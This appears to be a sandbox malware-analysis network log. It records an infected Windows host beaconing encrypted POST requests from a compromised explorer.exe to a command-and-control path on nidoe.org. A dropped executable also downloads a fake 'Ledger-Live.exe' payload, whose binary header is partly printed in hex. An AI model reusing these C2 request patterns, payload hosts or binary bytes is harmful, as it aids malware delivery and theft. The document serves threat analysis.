0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49866	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:10.295495987 CET	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ossomjpytyqoa.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 207 Host: nidoe.org
Mar 28, 2024 09:16:10.295517921 CET	207	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3b 24 bb f7 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vu;$}KuvuL%0'Zq_el6[$^\K3\0ogcYe9_yt6.F
Mar 28, 2024 09:16:10.983782053 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:10 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49870	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:11.255490065 CET	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://odidoedtaguftp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 296 Host: nidoe.org
Mar 28, 2024 09:16:11.255543947 CET	296	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 44 5d a7 a5 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vuD]xWHZelFk2"V?GF]M)L\|o$0K{yZ&gd1P^hF0<h,"EQjdi[J<)Zq
Mar 28, 2024 09:16:11.799218893 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:11 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49871	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:12.080729961 CET	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ycoewelqrxes.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: nidoe.org
Mar 28, 2024 09:16:12.080753088 CET	194	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 32 33 bc 86 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vu23P+VlaBudv'X^QQ]("VJDj$yH.;AphR
Mar 28, 2024 09:16:13.065567017 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:12 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49872	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:13.374844074 CET	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gefbqpjwvko.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: nidoe.org
Mar 28, 2024 09:16:13.374866009 CET	119	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 38 1e ee be Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vu8R;axJYWWm[oMp
Mar 28, 2024 09:16:13.930586100 CET	238	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:13 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49873	185.172.128.65	80	7664	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:13.598051071 CET	80	OUT	GET /Ledger-Live.exe HTTP/1.1 Host: 185.172.128.65 Cache-Control: no-cache
Mar 28, 2024 09:16:13.781461000 CET	1286	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 23 Mar 2024 02:26:34 GMT ETag: "1aa00-6144aab47aa80" Accept-Ranges: bytes Content-Length: 109056 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 45 86 8a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 32 01 00 00 76 00 00 00 00 00 00 8a 51 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 37 51 01 00 4f 00 00 00 00 60 01 00 20 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 0c 00 00 00 a0 50 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 90 31 01 00 00 20 00 00 00 32 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 73 00 00 00 60 01 00 00 74 00 00 00 34 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 01 00 00 02 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6b 51 01 00 00 00 00 00 48 00 00 00 02 00 05 00 64 30 00 00 b4 39 00 00 03 00 02 00 08 00 00 06 18 6a 00 00 88 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 03 20 34 02 00 00 14 14 04 28 16 00 00 0a 2a 32 03 04 16 14 14 05 6f 17 00 00 0a 2a 3a 03 04 05 16 14 14 0e 04 6f 18 00 00 0a 2a 13 30 09 00 2c 00 00 00 00 00 00 00 04 6f 19 00 00 0a 72 01 00 00 70 20 24 01 00 00 14 04 18 8d 16 00 00 01 25 16 03 a2 25 17 05 a2 14 6f 1a 00 00 0a 74 1a 00 00 01 2a 26 03 04 05 6f 1b 00 00 0a 2a 1e 02 28 1c 00 00 0a 2a 4a 02 72 21 00 00 70 18 73 1d 00 00 0a 28 1e 00 00 0a 2a 4a 73 09 00 00 06 25 6f 07 00 00 06 6f 1f 00 00 0a 26 2a 1e 02 28 20 00 00 0a 2a 36 02 28 21 00 00 0a 02 28 0b 00 00 06 2a 00 00 13 30 02 00 24 00 00 00 01 00 00 11 02 7b 02 00 00 04 2c 01 2a 02 17 7d 02 00 00 04 72 4b 00 00 70 18 73 1d 00 00 0a 0a 02 06 28 22 00 00 0a 2a 66 03 17 33 0d 02 04 74 04 00 00 02 7d 01 00 00 04 2a 02 17 7d 02 00 00 04 2a 1e 02 28 23 00 00 0a 2a ae 7e 03 00 00 04 2d 1e 72 a3 00 00 70 d0 05 00 00 02 28 24 00 00 0a 6f 25 00 00 0a 73 26 00 00 0a 80 03 00 00 04 7e 03 00 00 04 2a 1a 7e 04 00 00 04 2a 1e 02 80 04 00 00 04 2a 1a 7e 05 00 00 04 2a 1e 02 28 27 00 00 0a 2a 56 73 12 00 00 06 28 28 00 00 0a 74 06 00 00 02 80 05 00 00 04 2a 1e 02 7b 06 00 00 04 2a 22 02 03 7d 06 00 00 04 2a 00 13 30 03 00 47 00 00 00 02 00 00 11 73 29 00 00 0a 0a 02 28 14 00 00 06 0b 16 0c 2b 19 07 08 9a 0d 06 09 6f 2a 00 00 0a 26 06 1f 20 6f 2b 00 00 0a 26 08 17 58 0c 08 07 8e 69 32 e1 06 06 6f 2c 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJE"02vQ `@ `7QO` sP8 H.text1 2 `.rsrc s`t4@@.reloc@BkQHd09j> 4(2o:o0,orp $%%ot&o(Jr!ps(Js%oo&( 6(!(0${,}rKps("f3t}}(#~-rp($o%s&~~*~('Vs((t{"}0Gs)(+o*& o+&Xi2o,
Mar 28, 2024 09:16:13.781519890 CET	1286	IN	Data Raw: 0a 17 59 17 6f 2d 00 00 0a 26 06 6f 2e 00 00 0a 2a 52 02 1f 18 8d 3e 00 00 01 7d 06 00 00 04 02 28 23 00 00 0a 2a 13 30 03 00 92 00 00 00 00 00 00 00 02 28 5a 00 00 06 02 73 82 00 00 06 7d 0a 00 00 04 02 72 e5 00 00 70 73 76 00 00 06 7d 0b 00 00 Data Ascii: Yo-&o.R>}(#0(Zs}rpsv}{s}s}(\|}{-{oPs/sQ}Os/sQ}(M{N}rp(X:{oj{
Mar 28, 2024 09:16:13.781534910 CET	1286	IN	Data Raw: 77 00 00 06 28 8e 00 00 06 2d 06 02 28 4e 00 00 06 02 7b 0a 00 00 04 6f 7e 00 00 06 02 17 28 1a 00 00 06 2a e2 7e 28 00 00 04 25 2d 17 26 7e 27 00 00 04 fe 06 93 00 00 06 73 30 00 00 0a 25 80 28 00 00 04 73 31 00 00 0a 25 16 6f 32 00 00 0a 25 17 Data Ascii: w(-(N{o~(~(%-&~'s0%(s1%o2%o3o40(5B% o6i/((( ("($(&((((,(.(0
Mar 28, 2024 09:16:13.781563044 CET	1286	IN	Data Raw: 4a 02 73 58 00 00 0a 7d 1a 00 00 04 02 28 23 00 00 0a 2a 00 00 00 13 30 02 00 25 00 00 00 09 00 00 11 03 25 0b 75 52 00 00 01 2c 14 07 a5 52 00 00 01 0a 06 2d 03 17 2b 01 16 8c 33 00 00 01 2a 18 8c 33 00 00 01 2a 00 00 00 13 30 02 00 22 00 00 00 Data Ascii: JsX}(#0%%uR,R-+330"%u3,3RR(#~YrpoZ}(#}0,([o\{(y-{{o]{(y,{
Mar 28, 2024 09:16:13.781575918 CET	1286	IN	Data Raw: 07 00 00 00 28 00 00 00 4e 00 00 00 02 00 00 00 03 00 00 00 01 00 00 00 07 00 00 00 02 00 00 00 02 00 00 00 01 00 00 00 01 00 00 00 00 00 48 0b 01 00 00 00 00 00 06 00 2b 0a 56 11 06 00 98 0a 56 11 06 00 19 09 fe 10 0f 00 ca 11 00 00 06 00 5a 09 Data Ascii: (NH+VVZKdF7:-;j!<
Mar 28, 2024 09:16:13.781589985 CET	1286	IN	Data Raw: 10 00 c6 20 00 00 00 00 86 00 ff 13 06 00 10 00 d9 20 00 00 00 00 96 00 1c 0d 9b 02 10 00 ec 20 00 00 00 00 86 18 c8 10 06 00 10 00 f4 20 00 00 00 00 86 18 c8 10 06 00 10 00 04 21 00 00 00 00 e6 01 ff 13 06 00 10 00 34 21 00 00 00 00 e1 01 17 13 Data Ascii: !4!.N!V!v!!!!!!#!-!"0"
Mar 28, 2024 09:16:13.781603098 CET	1286	IN	Data Raw: 20 04 41 00 bf 2a 00 00 00 00 96 08 06 15 2e 02 41 00 c7 2a 00 00 00 00 96 08 1f 0e 03 01 42 00 ce 2a 00 00 00 00 96 08 26 0e 1b 04 42 00 d6 2a 00 00 00 00 96 08 44 14 20 04 43 00 dd 2a 00 00 00 00 96 08 4d 14 2e 02 43 00 e5 2a 00 00 00 00 91 18 Data Ascii: A.AB&BD CM.CD+-D+:D+E$+E-+{F5+F@+Gx+H+Q$H,I,,<*I`
Mar 28, 2024 09:16:13.781651974 CET	1286	IN	Data Raw: 71 00 c8 10 1a 00 79 00 c8 10 10 00 81 00 c8 10 10 00 89 00 c8 10 06 00 91 00 c8 10 22 00 a1 00 c8 10 28 00 e9 00 c8 10 06 00 f9 00 41 13 2e 00 09 01 c8 10 06 00 61 01 c8 10 06 00 b9 01 2a 06 34 00 c9 00 e2 0a 44 00 c9 00 eb 0a 53 00 b1 00 b7 07 Data Ascii: qy"(A.a*4DSchx1Vw!!!!&!A16
Mar 28, 2024 09:16:13.781687975 CET	1286	IN	Data Raw: 53 04 00 00 31 11 58 04 00 00 91 06 5d 04 00 00 bf 00 61 04 00 00 1d 01 61 04 00 00 5d 01 61 04 00 00 a5 01 61 04 00 00 cf 01 61 04 00 00 f9 01 61 04 00 00 23 02 61 04 00 00 56 02 61 04 00 00 84 02 61 04 00 00 10 00 61 04 00 00 6f 00 61 04 00 00 Data Ascii: S1X]aa]aaaa#aVaaaoaa2araaaa8aka&aaaHaaee:koLkQo>aaaaTkRS
Mar 28, 2024 09:16:13.781701088 CET	1286	IN	Data Raw: 73 65 74 5f 57 6f 72 64 31 34 00 67 65 74 5f 57 6f 72 64 32 34 00 73 65 74 5f 57 6f 72 64 32 34 00 54 6f 49 6e 74 36 34 00 67 65 74 5f 57 6f 72 64 34 00 73 65 74 5f 57 6f 72 64 34 00 67 65 74 5f 57 6f 72 64 31 35 00 73 65 74 5f 57 6f 72 64 31 35 Data Ascii: set_Word14get_Word24set_Word24ToInt64get_Word4set_Word4get_Word15set_Word15get_Word5set_Word5get_Word16set_Word16get_Word6set_Word6get_Word17set_Word17get_Word7set_Word7get_Word18set_Word18get_UTF8get_Word8set_Word8get_W
Mar 28, 2024 09:16:13.964873075 CET	1286	IN	Data Raw: 6e 67 65 00 49 6e 76 6f 6b 65 00 67 65 74 5f 49 73 56 69 73 69 62 6c 65 00 73 65 74 5f 49 73 56 69 73 69 62 6c 65 00 5f 69 73 56 69 73 69 62 6c 65 00 52 75 6e 74 69 6d 65 54 79 70 65 48 61 6e 64 6c 65 00 47 65 74 54 79 70 65 46 72 6f 6d 48 61 6e Data Ascii: ngeInvokeget_IsVisibleset_IsVisible_isVisibleRuntimeTypeHandleGetTypeFromHandleDeleteProgramFileGetTimestampFromFileCreateTimestampFileset_WindowStyleProcessWindowStyleget_BuildNameset_BuildNameset_FileNamefileName_valueNamese

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49874	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:14.223978043 CET	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ikqpprercanm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: nidoe.org
Mar 28, 2024 09:16:14.224009991 CET	213	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 26 52 e4 90 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vu&Re5}pGXL.o$F?k6'CH2VY@?a.<~&-Aq(AOQ
Mar 28, 2024 09:16:15.144783020 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:14 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49875	37.255.238.137	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Mar 28, 2024 09:16:15.667119980 CET	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mfpyonubktjl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 142 Host: nidoe.org
Mar 28, 2024 09:16:15.667263031 CET	142	OUT	Data Raw: 3b 6e 59 15 f7 bc 6e 54 d6 de c6 06 73 75 7e cb 7b 0f cd ec 1d 71 e2 16 01 75 79 9d 46 b1 c5 6a ed 2d ce 5a 0f 19 56 1b 9a 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 32 59 b6 e9 Data Ascii: ;nYnTsu~{quyFj-ZV? 9Yt M@NA -[k,vu2YWwzc^c]2L,?dWFcT<&o
Mar 28, 2024 09:16:16.986625910 CET	587	IN	HTTP/1.0 404 Not Found Date: Thu, 28 Mar 2024 08:16:16 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 340 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 